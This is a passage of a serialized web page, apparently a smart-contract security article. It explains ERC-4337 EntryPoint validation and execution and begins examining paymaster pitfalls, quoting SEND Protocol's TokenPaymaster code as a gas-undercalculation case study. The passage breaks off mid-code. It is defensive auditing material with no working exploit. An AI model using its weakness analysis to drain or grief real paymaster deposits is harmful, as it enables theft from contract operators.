",{"type":24,"tag":145,"props":109173,"children":109175},{"className":109174},[],[109176],{"type":30,"value":109177},"UserOp",{"type":30,"value":7905},{"type":24,"tag":145,"props":109180,"children":109182},{"className":109181},[],[109183],{"type":30,"value":108959},{"type":30,"value":1679},{"type":24,"tag":6246,"props":109186,"children":109187},{},[109188,109206,109224,109245,109257],{"type":24,"tag":2659,"props":109189,"children":109190},{},[109191,109198,109200],{"type":24,"tag":188,"props":109192,"children":109195},{"href":109193,"rel":109194},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L764-L777",[192],[109196],{"type":30,"value":109197},"Calculates",{"type":30,"value":109199}," the required prefund amount by summing up all specified gas limits (verification, execution, and paymaster if used) multiplied by the user's specified ",{"type":24,"tag":145,"props":109201,"children":109203},{"className":109202},[],[109204],{"type":30,"value":109205},"maxFeePerGas",{"type":24,"tag":2659,"props":109207,"children":109208},{},[109209,109216,109217,109222],{"type":24,"tag":188,"props":109210,"children":109213},{"href":109211,"rel":109212},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L545-L553",[192],[109214],{"type":30,"value":109215},"Calls",{"type":30,"value":13277},{"type":24,"tag":145,"props":109218,"children":109220},{"className":109219},[],[109221],{"type":30,"value":108926},{"type":30,"value":109223}," on the sender's smart account contract to verify the operation's validity (e.g. checking signatures)",{"type":24,"tag":2659,"props":109225,"children":109226},{},[109227,109229,109236,109238,109243],{"type":30,"value":109228},"If no paymaster is specified, attempts to ",{"type":24,"tag":188,"props":109230,"children":109233},{"href":109231,"rel":109232},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L554-L557",[192],[109234],{"type":30,"value":109235},"deduct",{"type":30,"value":109237}," the prefund amount from the sender's ETH deposit in the ",{"type":24,"tag":145,"props":109239,"children":109241},{"className":109240},[],[109242],{"type":30,"value":108959},{"type":30,"value":109244}," (this can be partially refunded later if actual execution costs less)",{"type":24,"tag":2659,"props":109246,"children":109247},{},[109248,109255],{"type":24,"tag":188,"props":109249,"children":109252},{"href":109250,"rel":109251},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L785-L788",[192],[109253],{"type":30,"value":109254},"Validates",{"type":30,"value":109256}," the nonce to prevent replay attacks",{"type":24,"tag":2659,"props":109258,"children":109259},{},[109260,109262,109268,109270,109276,109277,109282],{"type":30,"value":109261},"If a paymaster is specified, it will ",{"type":24,"tag":188,"props":109263,"children":109266},{"href":109264,"rel":109265},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L623-L627",[192],[109267],{"type":30,"value":109235},{"type":30,"value":109269}," the required prefund amount from the paymaster's deposited ETH and then ",{"type":24,"tag":188,"props":109271,"children":109274},{"href":109272,"rel":109273},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L629",[192],[109275],{"type":30,"value":45035},{"type":30,"value":13277},{"type":24,"tag":145,"props":109278,"children":109280},{"className":109279},[],[109281],{"type":30,"value":109064},{"type":30,"value":109283}," on the paymaster contract to verify it will cover gas costs",{"type":24,"tag":32,"props":109285,"children":109286},{},[109287,109289,109294,109296,109301],{"type":30,"value":109288},"Only after all these validation checks pass will the ",{"type":24,"tag":145,"props":109290,"children":109292},{"className":109291},[],[109293],{"type":30,"value":108959},{"type":30,"value":109295}," move on to actually executing the ",{"type":24,"tag":145,"props":109297,"children":109299},{"className":109298},[],[109300],{"type":30,"value":108878},{"type":30,"value":109302},". This strict validation flow ensures that:",{"type":24,"tag":2655,"props":109304,"children":109305},{},[109306,109311,109316,109321],{"type":24,"tag":2659,"props":109307,"children":109308},{},[109309],{"type":30,"value":109310},"The operation is legitimate and authorized by the user",{"type":24,"tag":2659,"props":109312,"children":109313},{},[109314],{"type":30,"value":109315},"Sufficient funds are available to cover gas (either from user or paymaster)",{"type":24,"tag":2659,"props":109317,"children":109318},{},[109319],{"type":30,"value":109320},"The operation cannot be replayed",{"type":24,"tag":2659,"props":109322,"children":109323},{},[109324],{"type":30,"value":109325},"All involved contracts (sender and paymaster) have approved the execution",{"type":24,"tag":32,"props":109327,"children":109328},{},[109329],{"type":30,"value":109330},"This multi-layered validation approach is crucial for maintaining security when processing operations that can involve complex smart account logic and third-party gas sponsorship.",{"type":24,"tag":80,"props":109332,"children":109334},{"id":109333},"execution-phase",[109335],{"type":30,"value":109336},"Execution Phase",{"type":24,"tag":32,"props":109338,"children":109339},{},[109340,109342,109347,109349,109356,109358,109363],{"type":30,"value":109341},"After all operations have passed validation, the ",{"type":24,"tag":145,"props":109343,"children":109345},{"className":109344},[],[109346],{"type":30,"value":108959},{"type":30,"value":109348}," begins the ",{"type":24,"tag":188,"props":109350,"children":109353},{"href":109351,"rel":109352},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L70-L72",[192],[109354],{"type":30,"value":109355},"execution",{"type":30,"value":109357}," phase, processing each ",{"type":24,"tag":145,"props":109359,"children":109361},{"className":109360},[],[109362],{"type":30,"value":108878},{"type":30,"value":109364}," individually. For each operation, the flow is:",{"type":24,"tag":6246,"props":109366,"children":109367},{},[109368,109428,109474],{"type":24,"tag":2659,"props":109369,"children":109370},{},[109371,109372,109377,109379,109385,109386,109392,109394],{"type":30,"value":8079},{"type":24,"tag":145,"props":109373,"children":109375},{"className":109374},[],[109376],{"type":30,"value":108959},{"type":30,"value":109378}," makes a ",{"type":24,"tag":188,"props":109380,"children":109383},{"href":109381,"rel":109382},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L213-L232",[192],[109384],{"type":30,"value":45035},{"type":30,"value":6000},{"type":24,"tag":145,"props":109387,"children":109389},{"className":109388},[],[109390],{"type":30,"value":109391},"innerHandleOp()",{"type":30,"value":109393},", which:\n",{"type":24,"tag":2655,"props":109395,"children":109396},{},[109397,109409,109414],{"type":24,"tag":2659,"props":109398,"children":109399},{},[109400,109407],{"type":24,"tag":188,"props":109401,"children":109404},{"href":109402,"rel":109403},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L403",[192],[109405],{"type":30,"value":109406},"Forwards",{"type":30,"value":109408}," the operation to the sender's smart account contract",{"type":24,"tag":2659,"props":109410,"children":109411},{},[109412],{"type":30,"value":109413},"Executes the intended transaction(s) within the smart account",{"type":24,"tag":2659,"props":109415,"children":109416},{},[109417,109419,109426],{"type":30,"value":109418},"Handles ",{"type":24,"tag":188,"props":109420,"children":109423},{"href":109421,"rel":109422},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L821",[192],[109424],{"type":30,"value":109425},"post-execution",{"type":30,"value":109427}," tasks and cleanup",{"type":24,"tag":2659,"props":109429,"children":109430},{},[109431,109433,109439,109441,109447,109448,109454,109456],{"type":30,"value":109432},"If a paymaster was used, ",{"type":24,"tag":145,"props":109434,"children":109436},{"className":109435},[],[109437],{"type":30,"value":109438},"Entrypoint",{"type":30,"value":109440}," will ",{"type":24,"tag":188,"props":109442,"children":109445},{"href":109443,"rel":109444},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L848-L857",[192],[109446],{"type":30,"value":45035},{"type":30,"value":13277},{"type":24,"tag":145,"props":109449,"children":109451},{"className":109450},[],[109452],{"type":30,"value":109453},"paymaster.postOp()",{"type":30,"value":109455}," to:\n",{"type":24,"tag":2655,"props":109457,"children":109458},{},[109459,109464,109469],{"type":24,"tag":2659,"props":109460,"children":109461},{},[109462],{"type":30,"value":109463},"Allow paymaster to finalize its accounting",{"type":24,"tag":2659,"props":109465,"children":109466},{},[109467],{"type":30,"value":109468},"Process any refunds or additional charges",{"type":24,"tag":2659,"props":109470,"children":109471},{},[109472],{"type":30,"value":109473},"Complete any paymaster-specific logic",{"type":24,"tag":2659,"props":109475,"children":109476},{},[109477,109479,109484,109485,109492,109494],{"type":30,"value":109478},"Finally, after all operations are processed, the ",{"type":24,"tag":145,"props":109480,"children":109482},{"className":109481},[],[109483],{"type":30,"value":108959},{"type":30,"value":13277},{"type":24,"tag":188,"props":109486,"children":109489},{"href":109487,"rel":109488},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L74",[192],[109490],{"type":30,"value":109491},"compensates",{"type":30,"value":109493}," the bundler for:\n",{"type":24,"tag":2655,"props":109495,"children":109496},{},[109497,109502,109507],{"type":24,"tag":2659,"props":109498,"children":109499},{},[109500],{"type":30,"value":109501},"Gas costs from executing all operations",{"type":24,"tag":2659,"props":109503,"children":109504},{},[109505],{"type":30,"value":109506},"Overhead from submitting the batch transaction",{"type":24,"tag":2659,"props":109508,"children":109509},{},[109510],{"type":30,"value":109511},"Any unused gas, which is refunded",{"type":24,"tag":32,"props":109513,"children":109514},{},[109515],{"type":30,"value":109516},"This execution flow ensures secure and atomic operation execution, accurate tracking and settlement of gas costs, support for custom paymaster payment logic, and proper compensation for bundlers who provide the transaction submission service.",{"type":24,"tag":32,"props":109518,"children":109519},{},[109520,109522,109527,109529,109535,109537,109542],{"type":30,"value":109521},"Now that we understand how the ",{"type":24,"tag":145,"props":109523,"children":109525},{"className":109524},[],[109526],{"type":30,"value":108959},{"type":30,"value":109528}," works at a high level, let's examine how some protocols have failed to properly implement ",{"type":24,"tag":145,"props":109530,"children":109532},{"className":109531},[],[109533],{"type":30,"value":109534},"paymasters",{"type":30,"value":109536}," that align with the ",{"type":24,"tag":145,"props":109538,"children":109540},{"className":109539},[],[109541],{"type":30,"value":108959},{"type":30,"value":109543},"'s execution model, leading to potential vulnerabilities.",{"type":24,"tag":25,"props":109545,"children":109547},{"id":109546},"common-pitfalls-in-paymaster-implementation",[109548],{"type":30,"value":109549},"Common Pitfalls in Paymaster Implementation",{"type":24,"tag":32,"props":109551,"children":109552},{},[109553,109555,109560],{"type":30,"value":109554},"While paymasters offer powerful flexibility, they also introduce new complexity, and with it, room for subtle bugs. Missteps in paymaster design can not only break gas sponsorship flows, but also expose their deposited ETH in the ",{"type":24,"tag":145,"props":109556,"children":109558},{"className":109557},[],[109559],{"type":30,"value":108959},{"type":30,"value":109561}," to exploitation or griefing.",{"type":24,"tag":32,"props":109563,"children":109564},{},[109565,109567,109572],{"type":30,"value":109566},"In this section, we’ll walk through the ",{"type":24,"tag":60,"props":109568,"children":109569},{},[109570],{"type":30,"value":109571},"two most common pitfalls",{"type":30,"value":109573}," we’ve observed in real-world paymaster implementations:",{"type":24,"tag":43,"props":109575,"children":109577},{"id":109576},"undercalculated-gas-costs",[109578],{"type":24,"tag":60,"props":109579,"children":109580},{},[109581],{"type":30,"value":109582},"Undercalculated Gas Costs",{"type":24,"tag":32,"props":109584,"children":109585},{},[109586,109588,109593,109595,109600,109602,109607,109609,109616],{"type":30,"value":109587},"To understand this issue, let's first examine how gas penalties work in the ",{"type":24,"tag":145,"props":109589,"children":109591},{"className":109590},[],[109592],{"type":30,"value":108959},{"type":30,"value":109594},". When a ",{"type":24,"tag":145,"props":109596,"children":109598},{"className":109597},[],[109599],{"type":30,"value":108878},{"type":30,"value":109601}," specifies an execution gas limit higher than what's actually used during execution, the ",{"type":24,"tag":145,"props":109603,"children":109605},{"className":109604},[],[109606],{"type":30,"value":108959},{"type":30,"value":109608}," charges a ",{"type":24,"tag":188,"props":109610,"children":109613},{"href":109611,"rel":109612},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L718-L728",[192],[109614],{"type":30,"value":109615},"penalty of 10%",{"type":30,"value":109617}," of the unused gas. This penalty is paid to the bundler and is deducted from either the user's deposit (for regular transactions) or the paymaster's deposit (when using a paymaster).",{"type":24,"tag":32,"props":109619,"children":109620},{},[109621],{"type":30,"value":109622},"Now, let's examine a real-world example of how this penalty mechanism could impact paymasters. The SEND Protocol's paymaster implementation provides an instructive case study:",{"type":24,"tag":291,"props":109624,"children":109626},{"className":11300,"code":109625,"language":11299,"meta":7,"style":7},"contract TokenPaymaster is BasePaymaster, UniswapHelper, OracleHelper {\n[...]\n function _validatePaymasterUserOp(PackedUserOperation calldata userOp, bytes32, uint256 requiredPreFund)\n internal\n override\n returns (bytes memory context, uint256 validationResult)\n {\n unchecked {\n uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n uint256 baseFee = tokenPaymasterConfig.baseFee;\n uint256 dataLength = userOp.paymasterAndData.length - PAYMASTER_DATA_OFFSET;\n require(dataLength == 0 || dataLength == 32, \"TPM: invalid data length\");\n uint256 maxFeePerGas = userOp.unpackMaxFeePerGas();\n uint256 refundPostopCost = tokenPaymasterConfig.refundPostopCost;\n require(refundPostopCost \u003C userOp.unpackPostOpGasLimit(), \"TPM: postOpGasLimit too low\");\n uint256 preChargeNative = requiredPreFund + (refundPostopCost * maxFeePerGas);\n // note: price is in native-asset-per-token increasing it means dividing it by markup\n uint256 cachedPriceWithMarkup = cachedPrice * DENOM / priceMarkup;\n if (dataLength == 32) {\n uint256 clientSuppliedPrice =\n uint256(bytes32(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET:PAYMASTER_DATA_OFFSET + 32]));\n if (clientSuppliedPrice \u003C cachedPriceWithMarkup) {\n // note: smaller number means 'more native asset per token'\n cachedPriceWithMarkup = clientSuppliedPrice;\n }\n }\n uint256 tokenAmount = weiToToken(preChargeNative, cachedPriceWithMarkup);\n tokenAmount += baseFee;\n SafeERC20.safeTransferFrom(token, userOp.sender, address(this), tokenAmount);\n context = abi.encode(tokenAmount, userOp.sender);\n validationResult =\n _packValidationData(false, uint48(cachedPriceTimestamp + tokenPaymasterConfig.priceMaxAge), 0);\n }\n }\n[...]\n function _postOp(PostOpMode, bytes calldata context, uint256 actualGasCost, uint256 actualUserOpFeePerGas)\n internal\n override\n {\n unchecked {\n uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n uint256 baseFee = tokenPaymasterConfig.baseFee;\n (uint256 preCharge, address userOpSender) = abi.decode(context, (uint256, address));\n preCharge -= baseFee; // don't refund the base fee\n uint256 _cachedPrice = updateCachedPrice(false);\n // note: price is in native-asset-per-token increasing it means dividing it by markup\n uint256 cachedPriceWithMarkup = _cachedPrice * DENOM / priceMarkup;\n // Refund tokens based on actual gas cost\n uint256 actualChargeNative = actualGasCost + tokenPaymasterConfig.refundPostopCost * actualUserOpFeePerGas;\n uint256 actualTokenNeeded = weiToToken(actualChargeNative, cachedPriceWithMarkup);\n if (preCharge > actualTokenNeeded) {\n // If initially provided token amount is greater than the actual amount needed, refund the difference\n SafeERC20.safeTransfer(token, userOpSender, preCharge - actualTokenNeeded);\n } else if (preCharge \u003C actualTokenNeeded) {\n // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n SafeERC20.safeTransferFrom(token, userOpSender, address(this), actualTokenNeeded - preCharge);\n }\n\n if (baseFee > 0) {\n SafeERC20.safeTransfer(token, tokenPaymasterConfig.rewardsPool, baseFee);\n }\n\n emit UserOperationSponsored(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n refillEntryPointDeposit(_cachedPrice);\n }\n }\n}\n",[109627],{"type":24,"tag":145,"props":109628,"children":109629},{"__ignoreMap":7},[109630,109674,109681,109738,109746,109754,109796,109803,109815,109837,109858,109888,109939,109969,109990,110028,110067,110084,110123,110147,110164,110207,110229,110246,110263,110270,110277,110303,110320,110355,110386,110398,110445,110452,110459,110466,110533,110540,110547,110554,110565,110584,110603,110667,110690,110723,110738,110773,110781,110820,110845,110866,110874,110901,110928,110936,110944,110986,110993,111000,111024,111040,111047,111054,111072,111085,111092,111100],{"type":24,"tag":301,"props":109631,"children":109632},{"class":303,"line":304},[109633,109637,109642,109647,109652,109656,109661,109665,109670],{"type":24,"tag":301,"props":109634,"children":109635},{"style":348},[109636],{"type":30,"value":96516},{"type":24,"tag":301,"props":109638,"children":109639},{"style":10246},[109640],{"type":30,"value":109641}," TokenPaymaster",{"type":24,"tag":301,"props":109643,"children":109644},{"style":348},[109645],{"type":30,"value":109646}," is",{"type":24,"tag":301,"props":109648,"children":109649},{"style":10246},[109650],{"type":30,"value":109651}," BasePaymaster",{"type":24,"tag":301,"props":109653,"children":109654},{"style":359},[109655],{"type":30,"value":377},{"type":24,"tag":301,"props":109657,"children":109658},{"style":10246},[109659],{"type":30,"value":109660},"UniswapHelper",{"type":24,"tag":301,"props":109662,"children":109663},{"style":359},[109664],{"type":30,"value":377},{"type":24,"tag":301,"props":109666,"children":109667},{"style":10246},[109668],{"type":30,"value":109669},"OracleHelper",{"type":24,"tag":301,"props":109671,"children":109672},{"style":359},[109673],{"type":30,"value":3035},{"type":24,"tag":301,"props":109675,"children":109676},{"class":303,"line":320},[109677],{"type":24,"tag":301,"props":109678,"children":109679},{"style":359},[109680],{"type":30,"value":17123},{"type":24,"tag":301,"props":109682,"children":109683},{"class":303,"line":335},[109684,109688,109693,109697,109702,109707,109712,109716,109721,109725,109729,109734],{"type":24,"tag":301,"props":109685,"children":109686},{"style":348},[109687],{"type":30,"value":96533},{"type":24,"tag":301,"props":109689,"children":109690},{"style":314},[109691],{"type":30,"value":109692}," _validatePaymasterUserOp",{"type":24,"tag":301,"props":109694,"children":109695},{"style":359},[109696],{"type":30,"value":362},{"type":24,"tag":301,"props":109698,"children":109699},{"style":348},[109700],{"type":30,"value":109701},"PackedUserOperation",{"type":24,"tag":301,"props":109703,"children":109704},{"style":348},[109705],{"type":30,"value":109706}," calldata",{"type":24,"tag":301,"props":109708,"children":109709},{"style":369},[109710],{"type":30,"value":109711}," userOp",{"type":24,"tag":301,"props":109713,"children":109714},{"style":359},[109715],{"type":30,"value":377},{"type":24,"tag":301,"props":109717,"children":109718},{"style":10246},[109719],{"type":30,"value":109720},"bytes32",{"type":24,"tag":301,"props":109722,"children":109723},{"style":359},[109724],{"type":30,"value":377},{"type":24,"tag":301,"props":109726,"children":109727},{"style":10246},[109728],{"type":30,"value":52904},{"type":24,"tag":301,"props":109730,"children":109731},{"style":369},[109732],{"type":30,"value":109733}," requiredPreFund",{"type":24,"tag":301,"props":109735,"children":109736},{"style":359},[109737],{"type":30,"value":791},{"type":24,"tag":301,"props":109739,"children":109740},{"class":303,"line":344},[109741],{"type":24,"tag":301,"props":109742,"children":109743},{"style":348},[109744],{"type":30,"value":109745}," internal\n",{"type":24,"tag":301,"props":109747,"children":109748},{"class":303,"line":401},[109749],{"type":24,"tag":301,"props":109750,"children":109751},{"style":348},[109752],{"type":30,"value":109753}," override\n",{"type":24,"tag":301,"props":109755,"children":109756},{"class":303,"line":415},[109757,109762,109766,109770,109775,109779,109783,109787,109792],{"type":24,"tag":301,"props":109758,"children":109759},{"style":308},[109760],{"type":30,"value":109761}," returns",{"type":24,"tag":301,"props":109763,"children":109764},{"style":359},[109765],{"type":30,"value":873},{"type":24,"tag":301,"props":109767,"children":109768},{"style":10246},[109769],{"type":30,"value":90533},{"type":24,"tag":301,"props":109771,"children":109772},{"style":348},[109773],{"type":30,"value":109774}," memory",{"type":24,"tag":301,"props":109776,"children":109777},{"style":369},[109778],{"type":30,"value":83053},{"type":24,"tag":301,"props":109780,"children":109781},{"style":359},[109782],{"type":30,"value":377},{"type":24,"tag":301,"props":109784,"children":109785},{"style":10246},[109786],{"type":30,"value":52904},{"type":24,"tag":301,"props":109788,"children":109789},{"style":369},[109790],{"type":30,"value":109791}," validationResult",{"type":24,"tag":301,"props":109793,"children":109794},{"style":359},[109795],{"type":30,"value":791},{"type":24,"tag":301,"props":109797,"children":109798},{"class":303,"line":439},[109799],{"type":24,"tag":301,"props":109800,"children":109801},{"style":359},[109802],{"type":30,"value":35943},{"type":24,"tag":301,"props":109804,"children":109805},{"class":303,"line":447},[109806,109811],{"type":24,"tag":301,"props":109807,"children":109808},{"style":308},[109809],{"type":30,"value":109810}," unchecked",{"type":24,"tag":301,"props":109812,"children":109813},{"style":359},[109814],{"type":30,"value":3035},{"type":24,"tag":301,"props":109816,"children":109817},{"class":303,"line":476},[109818,109823,109828,109832],{"type":24,"tag":301,"props":109819,"children":109820},{"style":10246},[109821],{"type":30,"value":109822}," uint256",{"type":24,"tag":301,"props":109824,"children":109825},{"style":359},[109826],{"type":30,"value":109827}," priceMarkup ",{"type":24,"tag":301,"props":109829,"children":109830},{"style":385},[109831],{"type":30,"value":523},{"type":24,"tag":301,"props":109833,"children":109834},{"style":359},[109835],{"type":30,"value":109836}," tokenPaymasterConfig.priceMarkup;\n",{"type":24,"tag":301,"props":109838,"children":109839},{"class":303,"line":495},[109840,109844,109849,109853],{"type":24,"tag":301,"props":109841,"children":109842},{"style":10246},[109843],{"type":30,"value":109822},{"type":24,"tag":301,"props":109845,"children":109846},{"style":359},[109847],{"type":30,"value":109848}," baseFee ",{"type":24,"tag":301,"props":109850,"children":109851},{"style":385},[109852],{"type":30,"value":523},{"type":24,"tag":301,"props":109854,"children":109855},{"style":359},[109856],{"type":30,"value":109857}," tokenPaymasterConfig.baseFee;\n",{"type":24,"tag":301,"props":109859,"children":109860},{"class":303,"line":504},[109861,109865,109870,109874,109879,109883],{"type":24,"tag":301,"props":109862,"children":109863},{"style":10246},[109864],{"type":30,"value":109822},{"type":24,"tag":301,"props":109866,"children":109867},{"style":359},[109868],{"type":30,"value":109869}," dataLength ",{"type":24,"tag":301,"props":109871,"children":109872},{"style":385},[109873],{"type":30,"value":523},{"type":24,"tag":301,"props":109875,"children":109876},{"style":359},[109877],{"type":30,"value":109878}," userOp.paymasterAndData.length ",{"type":24,"tag":301,"props":109880,"children":109881},{"style":385},[109882],{"type":30,"value":9253},{"type":24,"tag":301,"props":109884,"children":109885},{"style":359},[109886],{"type":30,"value":109887}," PAYMASTER_DATA_OFFSET;\n",{"type":24,"tag":301,"props":109889,"children":109890},{"class":303,"line":512},[109891,109896,109901,109905,109909,109913,109917,109921,109926,109930,109935],{"type":24,"tag":301,"props":109892,"children":109893},{"style":308},[109894],{"type":30,"value":109895}," require",{"type":24,"tag":301,"props":109897,"children":109898},{"style":359},[109899],{"type":30,"value":109900},"(dataLength ",{"type":24,"tag":301,"props":109902,"children":109903},{"style":385},[109904],{"type":30,"value":607},{"type":24,"tag":301,"props":109906,"children":109907},{"style":466},[109908],{"type":30,"value":685},{"type":24,"tag":301,"props":109910,"children":109911},{"style":385},[109912],{"type":30,"value":3308},{"type":24,"tag":301,"props":109914,"children":109915},{"style":359},[109916],{"type":30,"value":109869},{"type":24,"tag":301,"props":109918,"children":109919},{"style":385},[109920],{"type":30,"value":607},{"type":24,"tag":301,"props":109922,"children":109923},{"style":466},[109924],{"type":30,"value":109925}," 32",{"type":24,"tag":301,"props":109927,"children":109928},{"style":359},[109929],{"type":30,"value":377},{"type":24,"tag":301,"props":109931,"children":109932},{"style":329},[109933],{"type":30,"value":109934},"\"TPM: invalid data length\"",{"type":24,"tag":301,"props":109936,"children":109937},{"style":359},[109938],{"type":30,"value":589},{"type":24,"tag":301,"props":109940,"children":109941},{"class":303,"line":592},[109942,109946,109951,109955,109960,109965],{"type":24,"tag":301,"props":109943,"children":109944},{"style":10246},[109945],{"type":30,"value":109822},{"type":24,"tag":301,"props":109947,"children":109948},{"style":359},[109949],{"type":30,"value":109950}," maxFeePerGas ",{"type":24,"tag":301,"props":109952,"children":109953},{"style":385},[109954],{"type":30,"value":523},{"type":24,"tag":301,"props":109956,"children":109957},{"style":359},[109958],{"type":30,"value":109959}," userOp.",{"type":24,"tag":301,"props":109961,"children":109962},{"style":314},[109963],{"type":30,"value":109964},"unpackMaxFeePerGas",{"type":24,"tag":301,"props":109966,"children":109967},{"style":359},[109968],{"type":30,"value":4859},{"type":24,"tag":301,"props":109970,"children":109971},{"class":303,"line":619},[109972,109976,109981,109985],{"type":24,"tag":301,"props":109973,"children":109974},{"style":10246},[109975],{"type":30,"value":109822},{"type":24,"tag":301,"props":109977,"children":109978},{"style":359},[109979],{"type":30,"value":109980}," refundPostopCost ",{"type":24,"tag":301,"props":109982,"children":109983},{"style":385},[109984],{"type":30,"value":523},{"type":24,"tag":301,"props":109986,"children":109987},{"style":359},[109988],{"type":30,"value":109989}," tokenPaymasterConfig.refundPostopCost;\n",{"type":24,"tag":301,"props":109991,"children":109992},{"class":303,"line":635},[109993,109997,110002,110006,110010,110015,110019,110024],{"type":24,"tag":301,"props":109994,"children":109995},{"style":308},[109996],{"type":30,"value":109895},{"type":24,"tag":301,"props":109998,"children":109999},{"style":359},[110000],{"type":30,"value":110001},"(refundPostopCost ",{"type":24,"tag":301,"props":110003,"children":110004},{"style":385},[110005],{"type":30,"value":1849},{"type":24,"tag":301,"props":110007,"children":110008},{"style":359},[110009],{"type":30,"value":109959},{"type":24,"tag":301,"props":110011,"children":110012},{"style":314},[110013],{"type":30,"value":110014},"unpackPostOpGasLimit",{"type":24,"tag":301,"props":110016,"children":110017},{"style":359},[110018],{"type":30,"value":25153},{"type":24,"tag":301,"props":110020,"children":110021},{"style":329},[110022],{"type":30,"value":110023},"\"TPM: postOpGasLimit too low\"",{"type":24,"tag":301,"props":110025,"children":110026},{"style":359},[110027],{"type":30,"value":589},{"type":24,"tag":301,"props":110029,"children":110030},{"class":303,"line":643},[110031,110035,110040,110044,110049,110053,110058,110062],{"type":24,"tag":301,"props":110032,"children":110033},{"style":10246},[110034],{"type":30,"value":109822},{"type":24,"tag":301,"props":110036,"children":110037},{"style":359},[110038],{"type":30,"value":110039}," preChargeNative ",{"type":24,"tag":301,"props":110041,"children":110042},{"style":385},[110043],{"type":30,"value":523},{"type":24,"tag":301,"props":110045,"children":110046},{"style":359},[110047],{"type":30,"value":110048}," requiredPreFund ",{"type":24,"tag":301,"props":110050,"children":110051},{"style":385},[110052],{"type":30,"value":11206},{"type":24,"tag":301,"props":110054,"children":110055},{"style":359},[110056],{"type":30,"value":110057}," (refundPostopCost ",{"type":24,"tag":301,"props":110059,"children":110060},{"style":385},[110061],{"type":30,"value":772},{"type":24,"tag":301,"props":110063,"children":110064},{"style":359},[110065],{"type":30,"value":110066}," maxFeePerGas);\n",{"type":24,"tag":301,"props":110068,"children":110069},{"class":303,"line":652},[110070,110075,110079],{"type":24,"tag":301,"props":110071,"children":110072},{"style":1062},[110073],{"type":30,"value":110074}," // ",{"type":24,"tag":301,"props":110076,"children":110077},{"style":348},[110078],{"type":30,"value":73471},{"type":24,"tag":301,"props":110080,"children":110081},{"style":1062},[110082],{"type":30,"value":110083},": price is in native-asset-per-token increasing it means dividing it by markup\n",{"type":24,"tag":301,"props":110085,"children":110086},{"class":303,"line":666},[110087,110091,110096,110100,110105,110109,110114,110118],{"type":24,"tag":301,"props":110088,"children":110089},{"style":10246},[110090],{"type":30,"value":109822},{"type":24,"tag":301,"props":110092,"children":110093},{"style":359},[110094],{"type":30,"value":110095}," cachedPriceWithMarkup ",{"type":24,"tag":301,"props":110097,"children":110098},{"style":385},[110099],{"type":30,"value":523},{"type":24,"tag":301,"props":110101,"children":110102},{"style":359},[110103],{"type":30,"value":110104}," cachedPrice ",{"type":24,"tag":301,"props":110106,"children":110107},{"style":385},[110108],{"type":30,"value":772},{"type":24,"tag":301,"props":110110,"children":110111},{"style":359},[110112],{"type":30,"value":110113}," DENOM ",{"type":24,"tag":301,"props":110115,"children":110116},{"style":385},[110117],{"type":30,"value":1036},{"type":24,"tag":301,"props":110119,"children":110120},{"style":359},[110121],{"type":30,"value":110122}," priceMarkup;\n",{"type":24,"tag":301,"props":110124,"children":110125},{"class":303,"line":674},[110126,110130,110135,110139,110143],{"type":24,"tag":301,"props":110127,"children":110128},{"style":308},[110129],{"type":30,"value":65516},{"type":24,"tag":301,"props":110131,"children":110132},{"style":359},[110133],{"type":30,"value":110134}," (dataLength ",{"type":24,"tag":301,"props":110136,"children":110137},{"style":385},[110138],{"type":30,"value":607},{"type":24,"tag":301,"props":110140,"children":110141},{"style":466},[110142],{"type":30,"value":109925},{"type":24,"tag":301,"props":110144,"children":110145},{"style":359},[110146],{"type":30,"value":398},{"type":24,"tag":301,"props":110148,"children":110149},{"class":303,"line":692},[110150,110155,110160],{"type":24,"tag":301,"props":110151,"children":110152},{"style":10246},[110153],{"type":30,"value":110154}," uint256",{"type":24,"tag":301,"props":110156,"children":110157},{"style":359},[110158],{"type":30,"value":110159}," clientSuppliedPrice ",{"type":24,"tag":301,"props":110161,"children":110162},{"style":385},[110163],{"type":30,"value":21485},{"type":24,"tag":301,"props":110165,"children":110166},{"class":303,"line":3631},[110167,110172,110176,110180,110185,110189,110194,110198,110202],{"type":24,"tag":301,"props":110168,"children":110169},{"style":10246},[110170],{"type":30,"value":110171}," uint256",{"type":24,"tag":301,"props":110173,"children":110174},{"style":359},[110175],{"type":30,"value":362},{"type":24,"tag":301,"props":110177,"children":110178},{"style":10246},[110179],{"type":30,"value":109720},{"type":24,"tag":301,"props":110181,"children":110182},{"style":359},[110183],{"type":30,"value":110184},"(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET",{"type":24,"tag":301,"props":110186,"children":110187},{"style":385},[110188],{"type":30,"value":1679},{"type":24,"tag":301,"props":110190,"children":110191},{"style":359},[110192],{"type":30,"value":110193},"PAYMASTER_DATA_OFFSET 